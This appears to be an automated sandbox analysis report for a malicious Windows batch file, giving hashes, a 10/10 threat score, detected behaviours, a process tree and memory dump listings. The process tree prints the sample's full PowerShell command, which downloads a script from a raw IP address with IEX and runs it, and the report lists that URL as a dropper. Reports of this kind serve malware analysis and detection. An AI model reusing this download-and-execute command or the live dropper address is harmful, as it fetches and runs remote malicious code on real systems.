Analysis

  • max time kernel
    125s
  • max time network
    133s
  • platform
    windows10_x64
  • resource
    win10v191014
  • submitted
    12-02-2020 12:10

General

  • Target

    xtSAHQY3.bat

  • Size

    197B

  • MD5

    aa9afb0520c167913e548054c13559f1

  • SHA1

    f6d844dac49a6dcd129bfcca531204bb1763c83f

  • SHA256

    a2e505a398d475ddb2eb3e29ebde4b5f0706e31272b3e05cb807fa276fddd771

  • SHA512

    ebe22fd1498a042a6ea69b1ababd78d7d0e630f4d86da7f031fc094358d0532876a9bf9ac3ab9dfa9b4645c095191f68990ed3687aa6a30dddae2150cdea890a

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/xtSAHQY3

Signatures

  • Program crash 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xtSAHQY3.bat"
    1⤵
      PID:4876
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/xtSAHQY3');Invoke-QSYBCPMYHAZCUT;Start-Sleep -s 10000"
        2⤵
          PID:4920
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 704
            3⤵
            • Program crash
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious behavior: EnumeratesProcesses
            • Checks processor information in registry
            • Enumerates system info in registry
            PID:4984
      • \??\c:\windows\system32\taskhostw.exe
        taskhostw.exe -RegisterDevice -SettingChange -Full
        1⤵
          PID:4660

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/4984-0-0x0000000004770000-0x0000000004771000-memory.dmp

          Filesize

          4KB

        • memory/4984-1-0x0000000004B70000-0x0000000004B71000-memory.dmp

          Filesize

          4KB

        • memory/4984-2-0x0000000005200000-0x0000000005201000-memory.dmp

          Filesize

          4KB

        • memory/4984-9-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-10-0x00000000052F0000-0x00000000052F1000-memory.dmp

          Filesize

          4KB

        • memory/4984-11-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-12-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-13-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-14-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-15-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-16-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-17-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-18-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-19-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-20-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-21-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-22-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-23-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-24-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-25-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-26-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-27-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-28-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-29-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-30-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-31-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-32-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-33-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-34-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-35-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-36-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-37-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-38-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-39-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB

        • memory/4984-40-0x0000000004730000-0x0000000004731000-memory.dmp

          Filesize

          4KB